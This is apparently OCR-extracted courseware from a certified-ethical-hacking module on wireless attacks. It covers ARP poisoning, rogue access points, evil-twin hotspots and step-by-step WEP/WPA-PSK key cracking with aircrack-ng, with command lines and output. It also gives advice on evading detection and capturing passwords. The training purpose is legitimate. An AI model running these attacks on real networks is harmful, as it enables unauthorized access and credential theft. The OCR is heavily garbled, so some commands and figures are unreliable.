Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Step 3: De-authenticate (deauth) the client using Aireplay-ng

FIGURE 15.55: Aireplay-ng de-authenticating the client

Step 4: Associate your wireless card (fake association) with the AP you are accessing with aireplay-ng Command Prompt
C:\>aireplay-ng -1 0 e SECRET_SSID a le:64:51:3b:ff:3e h 02:24:2B:CD:68:EE e th l
22:25:10 W aitin g for beacon fram e (BS5ID : 1 E:6 4 :51 :3 B:FF3 E) on channel 11 22:25:10Sending Authentication Request 22:25:10 A uthentication successful 22:25:10 Sending Association Request 22:25:10Association successful :-)

‫ם‬

FIGURE 15.56: Associating wireless card

Module 15 Page 2296

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless ARP Poisoning Attack

CEH
Urt1fW4 ttfciul lUilwt

A P I sends updated MAC address info to the network routers and switches, which in turn update their routing and switching tables Access Pointl

Traffic now destined from the network backbone to Juggyboy's system is no longer sent to AP2

Access Point2

Attacker spoofs the MAC address of Jessica's Wireless Laptop and attempts to authenticate to A PI

Normal flow of wireless traffic

MAC Address 04 A4 52-33-61

Attacker uses A R P Poisoning tool such as Cain & Abel

a

MAC Address 00 45-B8-74-03

Attacker's System

Jessica's Wireless Laptop

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless ARP Poisoning Attack
ARP is used to determine the MAC address of an access point whose IP address is known. Usually the ARP doesn't possess any verification feature that can tell that the responses are from valid hosts or it is receiving a forged response. ARP poisoning is an attack technique that exploits the lack of verification. In this technique the ARP cache maintained by the OS with wrong MAC addresses are corrupted. This can be achieved by sending an ARP Replay pack constructed with a wrong MAC address. The ARP poison attack has its impact on all the hosts present in a subnet. All stations associated with a subnet affected to ARP poison attack are vulnerable as most of the APs act as transparent MAC layer bridges. All the hosts connected to a switch or hub are susceptible to ARP poisoning attacks if the access point is connected directly to that switch or hub without any router/firewall in between them. The following diagram illustrates the ARP poisoning attack process:

Module 15 Page 2297

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

A P I sends updated M A C address info to the network routers and switches, which in turn update their routing and switching tables

Traffic now destined from the netw ork backbone to Juggyboy's system is no longer sent to AP2

Access Point2

A
Attacker spoofs the M A C address of Normal flo w of wireless traffic Juggyboy's wireless laptop and attem pts to authenticate to A P I

&

/
M AC Address

M A C Address 04-A4-52-33-61

Attacker uses ARP Poisoning tool such as Cain & Abel

00-45-B8-74-03

Attacker's System FIGURE 15.57: Wireless ARP Poisoning Attack process

Juggyboy’s Wireless Laptop

In this wireless ARP spoofing attack, the attacker first spoofs the MAC address of Juggyboy's wireless laptop and attempts to authenticate to A PI. A P I sends the updated MAC address information to the network routers and switches, which in turn update their routing and switching tables. Traffic now destined from the network backbone to Juggyboy's system is no longer sent to AP2 instead it is sent to API.

Module 15 Page 2298

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

R ogue A c c e ss Point
Compact, pocketsized rogue AP device plugged into an Ethernet port of corporate network
Choose an appropriate location to plug in your rogue access point that allows maximum coverage from your connection point

Rogue access point device connected to corporate networks over a Wi-Fi link

Disable the SSID Broadcast (silent mode) and any management features to avoid detection

Place the access point behind a firewall, if possible, to avoid network

Software-based rogue access point running on a corporate Windows machine

Deploy a rogue access point for short period

USB-based rogue access point device plugged into a corporate machine

Copyright © b y

EG-Gtlincil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Rogue access points (APs) are the wireless access points that are installed on a network without authorization and are not under the management of the network administrator. These rogue access points lack the security controls provided for the authorized APs of a network, thus providing backdoor access to the network for anyone connecting to the rogue AP. To gain backdoor access to a network through a rogue AP, the attacker should follow these steps: 9 Choose an appropriate location to plug in your rogue access point that allows maximum coverage from your connection point Disable the SSID Broadcast (silent mode) and any management features to avoid detection Place the access point behind a firewall, if possible, to avoid network scanners Deploy a rogue access point for shorter periods

*

Rogue Access Point

9

9 9

Interesting scenarios for rogue AP installation/setup: 9 Compact, pocket-sized rogue AP device plugged into an Ethernet port of corporate network: compact, pocket-sized rogue APs are easily available on the market. These of their compact size. They can be brought into a particular location without any efforts

Module 15 Page 2299

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

and can be hidden easily. Also, these APs require very low power; therefore, they can be powered even from a battery for long durations. 6 Rogue AP device connected to corporate networks over a Wi-Fi link: The rogue AP device can also be connected to a network over a Wi-Fi link. This is possible when the target network also has Wi-Fi coverage. As the AP device connects wirelessly to the authorized network, hiding this rogue AP device is easy. This eliminates the need of unused Ethernet port of the target network, but installing the rogue AP device wirelessly requires the credentials of the target network. The attacker should use the Wi-Fi Ethernet Bridge in conjunction with a regular AP device in order to connect to the target network. USB-based rogue AP device plugged into a corporate machine: A USB-based rogue AP device is generally plugged in to a windows machine with access to the target network either though wired or wireless means. The machine's network access can be shared with a rogue device using the USB AP's software. This eliminates the need of unused Ethernet port and the credentials of the target Wi-Fi in order to set up a rogue AP. Software-based rogue AP running on a corporate Windows machine: In this scenario, no separate physical AP device is needed as the rogue AP are set up in the software itself on the embedded/plugged Wi-Fi adapter of the target network. This is possible through the virtual Wi-Fi capability of the latest Windows operating system, Windows 7. This makes the rogue AP even stealthier.

9

9

Module 15 Page 2300

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Evil Twin
Authorized Wi-Fi
Evil Twin is a wireless A P that pretends to be a legitimate AP by replicating another network name

CEH
Evil Twin

Attacker sets up a rogue A P outside the corporate perimeter and lures user to sign into the wrong AP

Once associated, users may bypass the enterprise security policies giving attackers access to network data

Evil Twin can be configured with a common residential SSID, hotspot SSID or SSID of a company's WLAN

Wi-Fi is everywhere these days and so are your employees. They take their laptops to Starbucks, to FedEx Office, and to the airport. How do you keep the company data safe?
Copyright © b y

EG-Gtlincil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Evil Tw in
Evil Twin is a wireless AP that pretends to be a legitimate AP by imitating another network name. It poses a clear and present danger to wireless users on private and public WLANs. Attacker sets up a rogue AP outside the corporate perimeter and lures user to sign into the wrong AP. Attackers can use attacking tools such as KARMA that monitors station probes to create an evil twin. It can adopt any commonly-used SSIDs as its own SSID in order to lure the users. Or Evil Twin can be configured with a common residential SSID, hotspot SSID or SSID of a company's WLAN. As long as legitimate users can be monitored with various tools even APs that do not send SSIDs in probe requests can be targeted. WLAN stations usually connect to specific APs based on its SSIDs and the signal strength and also the stations automatically reconnect to any SSID that has been used in the past. These issues allows the attackers to trick the legitimate users easily just by placing an Evil Twin near the target network. Once associated, users may bypass the enterprise security policies giving attackers access to network data.

o

Module 15 Page 2301

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

SSID: STARBUCKS

FIGURE 15.58: Evil twin

Module 15 Page 2302

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Set Up a Fake Hotspot (Evil Twin)

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

How to Set Up a Fake Hotspot (Evil Twin)
Hotspots available in the region may not always be a legitimate AP. There may be a possibility of evil twin mounted by the attacker that pretends to be a legitimate hotspot. It is difficult to differentiate between a legitimate hotspot and an evil twin as the evil twin pretends to be the legitimate one. For instance, a user tries to log in and finds two access points. One is legitimate, while the other is an identical fake (evil twin). The victim picks one; if it's the fake, the attacker gets login information and access to the computer. In the meantime, the user goes nowhere. He or she probably thinks it was just a login attempt that randomly failed. Following are the steps that illustrate the process of setting up or mounting a fake hotspot (Evil Twin): Q You will need a laptop with Internet connectivity (3G or wired connection) and a mini access point Q 9 Enable Internet Connection Sharing in Windows 7 or Internet Sharing in Mac OS X Broadcast your Wi-Fi connection and run a sniffer program to capture passwords

Module 15 Page 2303

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

A
Victim

V

Victim Broadcast SSID:Starbucks

a

i
Attacker Computer set as AP, Running a Sniffer

O

3G or Ethernet Connection to the Internet

Internet FIGURE 15.59: Setting up a fake hotspot

non
4 [ ► Show All

Sharing

Comj

Network Name: Channel:

Juggyboy Automatic

13

t...

Enable encryption (using WEP)

On
□ □

Sei
SCI Fih

Password: Confirm Password: W EP Key Length: 128-bit Internet Sharing: Off

□ D V □ w

□ □

SCI
Re Re

□ w(

0

If you plan to shar• computers, use a S and a 13 character

Internet Sharing allows other computers to share your connection to the Internet.
Share your connection from: Ethernet

Tl

Remote Appte Events
X gr i d Shar i ng

^
0

Internet Sharing
Bl ue t oot h Shar i ng

Q o

On

Ports
Ethernet AirPort FireWire

Cl i ck t he l ock t o p r e ve nt f u r t h e r c hange s .

FIGURE 15.60: Capturing passwords

Module 15 Page 2304

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless H acking M ethodology

tertMM

c EH
ttkM4l lUibM

GPS M apping

W ire le ss T ra ffic A n a lys is

The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources

C ra c k W i-Fi E n c ry p tio n

L au n ch W ire le ss A tta c k s

Copyright © b y IG -G O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Hacking Methodology
Wireless network, then you should determine the encryption used by the WLAN and then crack the encryption.

Module 15 Page 2305

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Crack WEP Using Aircrack
M o n ito r w ireless traffic W ith a ir m o n - n g

(«rt1fw 4

CEH

tlfcxjl H M bM

C :\>airmon-ng start ethl

Collect w ireless traffic data w ith a ir o d u m p - n g

C :\>airodump-ng --ivs --write capture ethl

Associate you r w ireless card w ith the A P you are accessing w ith aireplay-ng

C :\>aireplay-ng -1 0 -e SECRET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 ethl

Start packet injection w ith aireplay-ng

C:\>aireplay-ng -3 -b le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 ethl

D ecrypt the W E P Key w ith aircrack-ng

C :\>aircrack-ng -s capture.ivs

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

1/‫ *־‬How to Crack WEP Using A ircrack
WEP is a broken security algorithm for 802.11 wireless networks. It is intended to provide the data confidentiality in wireless networks. Attackers want to break this encryption key to break into the wireless networks. This WEP has vulnerabilities that can be exploited easily and thus, the W EP key can be cracked. The following steps explain the process of cracking WEP using the Aircrack tool. STEP 1: Monitor wireless traffic with airmon-ng C : \>airmon-ng s t a r t e th l STEP 2: Collect wireless traffic data with airodump-ng C : \>airodump-ng --ivs --w rite capture e th l STEP 3: Associate your wireless card with the AP you are accessing with aireplay-ng
C :\>aireplay-ng 0 1‫־‬ a 7 :71:f e :8 e :d 8 :25 ethl -e SECRET_SSID -a l e :64:51:3 b :f f :3e -h

STEP 4: Start packet injection with aireplay-ng
C :\>aireplay-ng -3 -b l e :64:51:3 b :f f :3e -h a 7 :71:f e :8 e :d 8 :25 ethl

STEP 5: Decrypt the WEP Key with aircrack-ng
C : \>aircrack-ng -s ca p tu re . iv s

Module 15 Page 2306

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

H ow to C rac k W EP U sing A irc ra c k Screenshot 1/2
Command Prompt
1
.L . c:\>a1rm on-ng start: e i n i

EH
S te p 1: Run airmon• ng in monitor mode

V . ..........

...........

■■ ■■ ■■■ ■ I■■■■

m ₪ ₪ ₪ ₪ ₪ m ‫גי‬
......... ENC OPN OPN W EP W EP W EP W EP CIPHER AUTH ESSID IAM ROGER "‫־‬

C:\>airodum p-ng —iv s --w rite c a p tu r e e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E PW R 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157

<
0 0 0 0

........ . . . . CH MB 54e 54e 54e 54e

*Data, #/s 3 2 0 1


S te p 2: Start airodump to discover SSIDs on interface and keep it running. Your capture file should contain more than 50,000 IVs to successfully

1
5 9 11

COMPANYZONE ■ HOM E SECRET_SSID

BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E

Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD

PW R -1 76

Rate 1- 0 le-54

Lost 0 0

Packets 1 6

Probes

‫•׳י‬

crack the W E P key.

5*S Command Prompt
C:\>aireplay-ng -1 0 -e SEC R ET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 e t h l
22:25:10 Waiting for beacon frame (BSSltf:15:64:51:3B:FF:3E) o n W y in e l 11

_ §
< ................. Step 3: Associate
your wireless card with target access point

22:25:10 Sending Authentication Request 22:25:10 Authentication successful 22:25:10 Sending Association Request 22:25:10 Association successful:-)

Target M A C address

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

How to Crack WEP Using A ircrack Screenshot 1/2
Aircrack is a tool that can be used for cracking W EP encryption, which provides the data confidentiality for wireless networks. The following are screenshots of the W EP cracking process using the Aircrack tool. Step 1: Run airmon-ng in monitor mode. Step 2: Start airodump to discover SSIDs on interface and keep it running. Your capture file should contain more than 50,000 IVs to successfully crack the WEP key. r7 Command Prompt

□1
A.

c:\>airm0 n-ng start e t h l C:\>airodump-ng --ivs --w rite capture e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E PWR 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157 PWR -1 76 #Data, #/s 3 2 0 1 Rate 1-0 le-54 0 0 0 0 CH 1 5 9 11 Lost 0 0 MB 54e 54e 54e 54e ENC OPN OPN WEP WEP WEP WEP Probes CIPHER AUTH ESSID IAMROGER COMPANYZONE HOME SECRETSSID

_

Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD

Packets 1 6

FIGURE 15.61: Discovering SSIDs using airodump

Module 15 Page 2307

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Step 3: Associate your wireless card with the target access point, a Command Prompt □

C:\>aireplay-ng -1 0 -e SECRET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 e th l 22:25:10 Waiting for beacon frame (BSSIl3!iJE:64:51:3B:FF:3E)on^F!aj1neI 11 22:25:10 Sending Authentication Request 22:25:10 Authentication successful 22:25:10 Sending Association Request 22:25:10 Association successful:-) Target SSID Target MAC address

FIGURE 15.61: Screenshot showing target SSID and MAC address

Module 15 Page 2308

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Crack WEP Using Aircrack Screenshot 2/2
r—a?
jjjj Command Prompt
< ■ C:\>aireplay-ng -3 -b l e: 64: 51: 3b :f f: 3e -h a7:71:fe:8e:d8:25 e t h l

EH
S te p 4: Inject packets using aireplay-ng to generate traffic on target access point

22:30:15 W aiting for beacon fram e (BSSID: 1E:64:51:3B:FF:3E)

Saving A RP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies Read 11978 packets (got 7193 A RP requests), sent 3902 packets...

P&t Command Prompt
C:\>aircrack-ng -s capture.ivs
Opening capture.ivs Read 75168 packets. Aircrack-ng 0.7 rl3 0 [00:00:10] Tested 77 keys (got 684002 IVs) KB depth byte(vote) 0 0 /1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0) 1 0 / 3 66( 41) F I( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9) 2 0 /2 5C( 89) 52( 60) E3( 22) 10( 20) F3( 18) 8B( 15) 8E( 15) 14( 13) D2( 11) 47( 10) 3 0 /1 FD( 375) 81( 40) ID ( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17) KEY FOUND! [ AE:66:5C:FD:24 ]

□j
^ ................................................... .................
S te p 5: W a it for airodump-ng to capture more than 50,000 IVs Crack W E P key using aircrack-ng.

Copyright © b y IG -G O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

How to Crack WEP Using A ircrack Screenshot 2/2
Step 4: Inject the packet using aireplay-ng to generate traffic on the target access point. ijgg Command Prompt
C:\>aireplay-ng -3 -b le:6 4 :5 1 :3 b :ff:3 e -h a7:71:fe:8e:d8:25 e t h l
22:30:15 Waiting for beacon frame (BSSID: 1E:64:51:3B:FF:3E)

‫ם‬

Saving ARP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

FIGURE 15.62: Generating traffic on the target access point using aireplay-ng

Step 5: Wait for airodump-ng to capture more than 50,000 IVs Crack WEP key using aircrack-ng.

Module 15 Page 2309

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Command Prompt
C:\>aircrack-ng -s cap ture.ivs Opening capture.ivs Read 75168 packets. Aircrack-ng 0.7 rl30 [00:00:10] Tested 77 keys (got 684002 IVs) KB depth byte(vote) 0 0/1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0) 10/3 66( 41) F I( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9) 2 0/2 5C( 89) 52( 60) E3{ 22) 10( 20) F3( 18) 8 B( 15) 8 E{ 15) 14( 13) D2( 11) 47( 10) 3 0/1 FD( 375) 81( 40) ID ( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) OB( 17) 35( 17) KEY FOUND! [ AE:66:5C:FD:24 ]

FIGURE 15.63: Capturing 50,000 IVs Crack WEP key using aircrack-ng

Module 15 Page 2310

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Crack WPA-PSK Using Aircrack
S te p 1

I

S te p 2
Collect wireless traffic data with airodump-ng
C :\>airodump-ng ethlr --write capture

Monitor wireless traffic with airmon-ng
C :\>airmon-ng start ethl

02S Command Prompt
C:\>airmon‫־‬ ng s tart ethl C:\>airodump-ng BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C: 95: 6C: FC 1E:64:51:3B:FF:3E -write capture ethl PWR RXQ Beacons #Data, # / s 99 5 60 3 0 99 9 75 2 0 99 0 15 0 0 157 1 0 76 70 CH 1 5 9 11 MB 54e 54e 54e 54e ENC CIPHER AUTH ESSID OPN IAMROGER WPA TKIP PSK COMPANYZONE WEP WEP HOME WEP WEP SECRET_SSID

BSSID S t a t i o n PWR 1E :64 : 5 1 : 3 B : F F : 3 E 00:17:9A:C3:CF:C2 1 1 E : 6 4 : 5 1 :3 B:F F:3 E 00:1F:5B:BA:A7:CD 76

Rate L o s t Packets Probes 1-0 0 1 le-54 0 6


Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

How to Crack WPA-PSK Using Aircrack
WPA-PSK is an authentication mechanism in which users provide some form of credentials for authentication of a network. Encryption mechanisms used for WPA and WPAPSK are same, but the only difference between these two is authentication is reduced to a simple common password in WPA-PSK. The preshared key (PSK) mode of WPA is considered vulnerable to the same risks as any other share password system. This WPA-PSK can be cracked using the Aircrack tool. The following are the steps to crack WPA with Aircrack: Step 1: Monitor wireless traffic with airmon-ng C : \>airmon-ng s t a r t e th l Step 2: Collect wireless traffic data with airodump-ng C : \>airodump-ng --w rite capture e t h lr

Module 15 Page 2311

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Command Prom pt
C:\>airmon-ng


■ Beacons 60 75 15 157 PW R -1 76 #Data, #/s 3 2 0 1 Rate 1-0 le 54 0 0 0 0 CH 1 5 9 11 Lost 0 0 MB 54e 54e 54e 54e ENC OPN WPA W EP W EP TKIP W EP W EP Probes PSK CIPHER AUTH ESSID IAMROGER COMPANYZONE I HOME SECRET SSID

start ethl
PW R 99 99 99 76 Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD RXQ 5 9 0 70

c:\>airodump-ng -write capture ethl
BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E

Packets 1 6

FIGURE 15.64: Collecting wireless traffic data using airodump-ng

Module 15 Page 2312

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Crack WPA-PSK Using Aircrack (C on t‫)!־׳‬
Command Prompt
C: \>airepl ayng -deauth 11 a02:24:2B:CD:68:EE

CEH

Step 3 : De-authenticate (deauth) the client using Aireplay-ng. The client will try to authenticate with AP which will lead to airodump capturing an authentication packet (WPA handshake)

Step 4 : Run the capture file through aircrack-ng m Command Prompt

H
WPA < 1 handshako

c:\ > a i r c r a c k n g . e x ea2 ■w capture.cap
Opening capture.cap Read 607 packets • BSSIS ESSID Encryption 102:24:2B:CD:68:EE COMPANYZONE Choosing first network as target. Opening ../capture.cap Peading packets, please wait...

Aircrack-ng 0.7 rl30 [00:00:03) 230 keys tested (73.41 k/s) KEY FOUNDI[ passkey] Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31AA 37 AC 82 5A 55 B5 55 24 EE Transdent Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D O 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD EAPOL HMAC : 52 27 B8 3F 73 7C 45 AO 05 97 69 5C 30 78 60 BD

Copyright © by EG-CtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited.

How to Crack WPA-PSK Using A ircrack (Cont’d)
Step 3: Deauthenticate (deauth) the client using Aireplay-ng. The client will try to authenticate with AP, which will lead to airodump capturing an authentication packet (WPA handshake).

FIGURE 15.65: Deauthenticating (deauth) the client using Aireplay-ng

Step 4: Run the capture file through aircrack-ng.

Module 15 Page 2313

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Command Prompt
c : \>aircrack-ng.exe-a 2 -w capture.cap
Opening capture.cap Read 607 packets
# BSSIS ESSID Encryption
W P A <1 h a n d s h a k e s 1 0 2 :2 4 : 2 B : C D : 6 8 :E E C0M PA N Y20N E

□1

C h o o s in g f ir s t n e t w o r k a s t a r g e t . O p e n in g ../ c a p tu r e .c a p P e a d in g p a c k e ts , p le a s e w a it ...

Aircrack-ngO.7 rl30 [00:00:03] 230 keys tested (73.41k/s) KEY FOUND! [passkey] M aster Key : CD D7 9A 5A CF BO 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 DO 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC D A6A 6E D9 62 CD EAPOL HMAC : 52 27 B8 3F 73 7C 45 AO 05 97 69 5C 30 78 60 BD

FIGURE 15.66: Running the capture file through aircrack-ng

Module 15 Page 2314

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

WPA Cracking Tool: KisMAC
1 Delete Test Injection Jo in Network Show Details x< a 1 XT XX J ‫ז‬ 1

CEH

, KisM AC 0.3.3

‫ן‬ 1

N e tg e a rIn c . 2 0 X 2 0 7 1 01 14 22 8‫( י‬ 2 0 1 2 0 7 1 02 1 :3 6 :3 3h1 C h a n n e l M a m C h a n n e l s S u p p o r te dR a t e s 1 .2 .5 .5 .1 1 .1 8 .2 4 .3 6 .5 S * g n a l M a * S ig n a l A v g S ig n a l T y p e 1 E n c r y p tio n R a c k e ts 4 4 1 0 6 1 D a taP a c k e ts 3 7 5 S 0 3 M a n a g e m e n tP a c k •6 5 5 5 • C o n tr o lP a c k e ts 0 U n iq u eIV s 2 5 3 7 9 1 In j.P a c k e ts 1 0 0 • y te s 5 67 3 M .S K e y < u n r e s o lv e d > A S C II K e y < u n r e s o lv e d > la s tiv 0 00 00 0 N oE le v a tio nD a ta

Monitor Signal Strength Monitor all signals Deauthenticate

A XM

OS8D

Deauthenticate all Networks Authentication Flood Reinject Packets unknown Crack ► •

e < v .B y te s IPA d d r e s s L a s tS e e n 5 « g n a l s e n tB y te s r 2 2 8 8u n k n o w n 2 2 8 8u n k n o w n 1 9 0 8u n k n o w n 2 2 8 8u n k n o w n 2 6 6 8u n k n o w n 1 9 0 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 2 6 6 8u n k n o w n 1 S 2 8u n k n o w n 1 9 0 8u n k n o w n 0 0
against LEAP Key ► against W PA Key against 40-bit Apple Key against 104-bit Apple Key against 104-bit MD5 Key

KzzxLzzmm
Weak Scheduling Attack

!unknown

Bruteforce

0 0 unknown 0 0 unknown 0 0 unknown 0 0 unknown 0 0 unknown__________ 0_________ 0

«l You can crack/brute force WEP and WPA passwords using KisMAC «l KisMAC runs on MAC OS X
2 6 6 8u n k n o w n ?7 8 8u n k n o w n

Ji

Start Scan

*

h ttp://trac. kismac-ng. org
Copyright © b y iC - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

WPA C racking Tool: K isM AC
Source: http://trac.kismac-ng.orR KisMAC is a sniffer/scanner application for Mac OS X. It uses monitor mode and passive scanning. It supports many third-party USB devices such as Intersil Prism2, Ralin rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is supported for scanning. A few KisMAC features include: 9 9 Q Q 9 Reveals hidden / cloaked / closed SSIDs Shows logged in clients (with MAC addresses, IP addresses, and signal strengths) Mapping and GPS support Can draw area maps of network coverage PCAP import and export

Q Support for 802.llb /g 9 9 9 9 Different attacks against encrypted networks Deauthentication attacks AppleScript-able Kismet drone support (capture from a Kismet drone)

Module 15 Page 2315

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

f |

D«lete Test Injection

X® 1 1 XT XX) 1

S S ID B S S JD S e tg e a rIn c . firs tSw r 2 0 1 2 0 7 1 01 14 22 8‫( י‬ , L a s tS e e n C h a n n e l M a m C h a n n e l , S u p p o rte dR a te s S « o n a l M a x S < g n a J AvgSignal m a n a g e d T y p e
Encryption
WEP

* n Property

1 Join Network Show Details Monitor Signal Strength Monitor all signals

~XM

0XD Deauthenticate Deauthenticate all Networks Authentication Flood Reinject Packets

